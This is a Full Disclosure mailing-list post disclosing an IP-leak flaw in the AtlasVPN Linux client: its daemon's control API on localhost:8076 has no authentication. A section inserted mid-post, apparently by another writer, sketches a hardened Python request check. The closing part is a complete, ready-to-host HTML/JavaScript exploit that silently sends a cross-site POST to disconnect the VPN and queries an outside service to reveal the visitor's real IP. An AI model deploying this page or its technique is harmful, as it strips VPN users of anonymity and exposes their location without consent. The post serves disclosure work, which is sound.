Date: Fri, 01 Sep 2023 18:49:19 +0000
From: icudar via Fulldisclosure <fulldisclosure@...lists.org>
To: "fulldisclosure@...lists.org" <fulldisclosure@...lists.org>
Subject: [FD] AtlasVPN Linux Client 1.0.3 IP Leak Exploit

The following is my 0day. This code, when executed on any website, disconnects the AtlasVPN Linux client and leaks the user's IP address. I am not yet aware of it being used in the wild. However, it shows that AtlasVPN does not take their users' safety seriously, because their software security decisions suck so massively that it's hard to believe this is a bug rather than a backdoor. Nobody can be this incompetent. I tried to contact their support to get hold of a security contact, a PGP key or any signs of a bug bounty programme. Nope. No answer.

Root Cause

The AtlasVPN Linux client consists of two parts: a daemon (atlasvpnd) that manages the connections, and a client (atlasvpn) that the user runs to connect, disconnect and list servers. Rather than talking to the daemon over a local socket or any other authenticated channel, the client uses an HTTP API that the daemon exposes on localhost, port 8076. That API has NO authentication at all. The port can be reached by ANY program running on the computer, including the browser, so malicious JavaScript on ANY website can craft a request to it and disconnect the VPN. A follow-up request from the same page to an external IP-echo service then reveals the user's home IP address to ANY website running the exploit code.
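The design flaw above is a localhost control API that trusts every request that reaches the port. Browsers forward cross-site form POSTs with a urlencoded body without a CORS preflight (only the response is withheld from the page), so "reachable from localhost" means "reachable from any website the user visits". The added example below is not AtlasVPN's code; it is a hypothetical daemon request check written for this post. Only the port (8076) and the /connection/stop path come from the advisory; the token file, header names and handler are assumptions. It puts the weak accept-everything rule beside a hardened one that rejects browser-originated requests (they always carry Origin or Referer), pins the Host header against DNS rebinding, and requires a per-user bearer token read from a 0600 file.

```python
"""Hypothetical localhost control API: the weak authorization rule beside a hardened one.

Illustrative code, not AtlasVPN's daemon. Port 8076 and /connection/stop are from
the advisory; everything else here is an assumption made for the example.
"""
import os
import secrets
from http.server import BaseHTTPRequestHandler, HTTPServer

LISTEN = ("127.0.0.1", 8076)
ALLOWED_HOSTS = ("127.0.0.1:8076", "localhost:8076")
TOKEN_PATH = "atlasvpnd-demo.token"  # assumed location of the per-user secret

# Constructed request headers shaped like the cross-site form POST in the
# advisory. A browser always attaches Origin to such a POST; the page cannot
# strip it, which is what the hardened rule relies on.
BROWSER_POST = {
    "Host": "127.0.0.1:8076",
    "Origin": "http://evil.example",
    "Content-Type": "application/x-www-form-urlencoded",
}


def _header(headers, name):
    """Case-insensitive header lookup; returns "" when absent."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def vulnerable_authorize(headers):
    """Weak design: whatever reaches the port is trusted (the advisory's bug)."""
    return True, "accepted"


def hardened_authorize(headers, expected_token):
    """Return (allowed, reason) for a control request.

    Checks, in order: Host pinned to the loopback listener (defeats DNS
    rebinding), no browser-originated request (Origin/Referer present),
    and a constant-time bearer-token comparison.
    """
    if _header(headers, "Host") not in ALLOWED_HOSTS:
        return False, "bad Host header (possible DNS rebinding)"
    if _header(headers, "Origin") or _header(headers, "Referer"):
        return False, "browser-originated request refused"
    auth = _header(headers, "Authorization")
    if not auth.startswith("Bearer "):
        return False, "missing bearer token"
    presented = auth[len("Bearer "):]
    if not secrets.compare_digest(presented, expected_token):
        return False, "wrong token"
    return True, "accepted"


class ControlHandler(BaseHTTPRequestHandler):
    """Minimal daemon endpoint that applies the hardened rule to every POST."""
    token = ""  # filled in by serve()

    def do_POST(self):
        allowed, reason = hardened_authorize(dict(self.headers), self.token)
        if not allowed:
            self.send_response(403)
            self.end_headers()
            self.wfile.write(reason.encode())
            return
        if self.path == "/connection/stop":
            # A real daemon would tear the tunnel down here.
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"disconnected")
        else:
            self.send_error(404)


def issue_token(path=TOKEN_PATH):
    """Write a fresh random token to a file only the owning user can read."""
    token = secrets.token_hex(32)
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_TRUNC, 0o600)
    with os.fdopen(fd, "w") as handle:
        handle.write(token)
    return token


def serve():
    ControlHandler.token = issue_token()
    HTTPServer(LISTEN, ControlHandler).serve_forever()


if __name__ == "__main__":
    serve()
```

A local CLI client would read the token file and send `Authorization: Bearer <token>`; a web page has no way to read that file, no way to drop the Origin header, and (with the Host check) no way to reach the listener through a rebound hostname. A Unix domain socket with filesystem permissions removes the browser from the picture entirely and is the simpler fix where the client and daemon run on the same host.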

Exploit Code

The following code demonstrates the issue. It can be uploaded to any web server. When the site is visited, AtlasVPN disconnects and the IP address is leaked. Not intended for illegal purposes.



    <html>
    <head>
      <title>=[ atlasvpnd 1.0.3 remote disconnect exploit ]=</title>
    </head>
    <body>
      <pre><code id="log">=[ atlasvpnd 1.0.3 remote disconnect exploit ]=
    You should be running the atlasvpn linux client and be connected to a VPN.
    Use <b>atlasvpn connect</b> to connect to a VPN server.
    </code></pre>
      <!-- Hidden target frame so the form POST does not navigate this page -->
      <iframe id="hiddenFrame" name="hiddenFrame" style="display: none;"></iframe>
      <!-- Cross-site form POST to the unauthenticated daemon API on localhost -->
      <form id="stopForm" action="http://127.0.0.1:8076/connection/stop" method="post" target="hiddenFrame">
        <button type="submit" style="display: none"></button>
      </form>
      <script>
        window._currentIP = false;

        // Run main exploit code: record the IP, send the disconnect, record the IP again
        window.addEventListener('load', function () {
          addIPToLog();
          setTimeout(triggerFormSubmission, 1000);
          setTimeout(addIPToLog, 3000);
        });

        // Blind cross-origin request to atlasvpnd to disconnect the VPN.
        // The response cannot be read, but the request itself is delivered.
        function triggerFormSubmission() {
          var logDiv = document.getElementById('log');
          logDiv.innerHTML += "[-] Sending disconnect request to atlasvpnd...\n";
          document.getElementById('stopForm').submit();
        }

        // Gets the public IP from the ipify API (this, of course, could be your server)
        function addIPToLog() {
          var logDiv = document.getElementById('log');
          var xhr = new XMLHttpRequest();
          xhr.open('GET', 'https://api.ipify.org?format=json', true);
          xhr.onload = function () {
            var ipAddress = window._currentIP;
            if (xhr.status === 200) {
              var response = JSON.parse(xhr.responseText);
              ipAddress = response.ip;
              logDiv.innerHTML += '[?] Current IP: ' + ipAddress + "\n";
            } else {
              logDiv.innerHTML += '[-] Error fetching IP address.\n';
            }
            // Check if the IP changed. If yes: success.
            if (window._currentIP && window._currentIP != ipAddress) {
              logDiv.innerHTML += "[+] Successfully disconnected VPN.\n";
            }
            if (window._currentIP && window._currentIP == ipAddress) {
              logDiv.innerHTML += "[-] Disconnect failed or you were not connected to the VPN in the first place.\n";
            }
            // Save IP for next iteration.
            window._currentIP = ipAddress;
          };
          xhr.onerror = function () {
            logDiv.innerHTML += '[-] Network error fetching IP address.\n';
          };
          xhr.send();
        }
      </script>
    </body>
    </html>


Greets

Fly out to a certain crafter of trashy maps and my favourite WoW NPC. I hope this makes it into the press. Peace out.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/